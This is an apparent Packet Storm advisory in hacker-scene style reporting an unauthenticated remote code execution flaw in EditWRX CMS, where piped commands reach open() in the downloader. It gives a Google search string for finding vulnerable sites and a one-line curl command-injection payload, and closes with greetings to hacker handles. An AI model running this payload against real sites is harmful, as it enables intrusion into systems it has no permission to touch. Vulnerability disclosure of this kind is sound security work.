EditWRX CMS suffers from a remote code execution vulnerability due to a mishandling of data passed to open().
241c1c8935feedd8aac87ec4e8b3ee245ae2c33af855493ff13b3c8915bccabd
__ __ ____ ______ ______ ______
.----.| |--.|__|.-----.-----.--.--.|_ | |__ |__ | |
| __|| || || _ | _ | | | _| |_|__ |__ |_ |
|____||__|__||__|| __| __|___ ||______|______|______| |____|
_________________|__|__|__|__|_____|_____________________________
VULN_____________________________________________________________
EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
NFO______________________________________________________________
EditWRX is vulnerable to remote code execution through mishandling
of open() in the downloader, which can read in piped commands.
Despite the downloader being an administrative component, a login
is not required to call the function, and therefore no access is
required to exploit this vulnerability.
ZDAY_____________________________________________________________
Google: inurl:editwrx/wrx.cgi
RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a|
Found by: chippy1337
GREETZ___________________________________________________________
Robert Cavanaugh
Ryan Cleary
Jasper Lingers
Carlos1337 (dos cero dia!)
MASTER HACKER
FLOOD HACKER
DR TIGER
WANG HACKER
DDOS KING
Sabu, Havij Professional
D0xbin
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed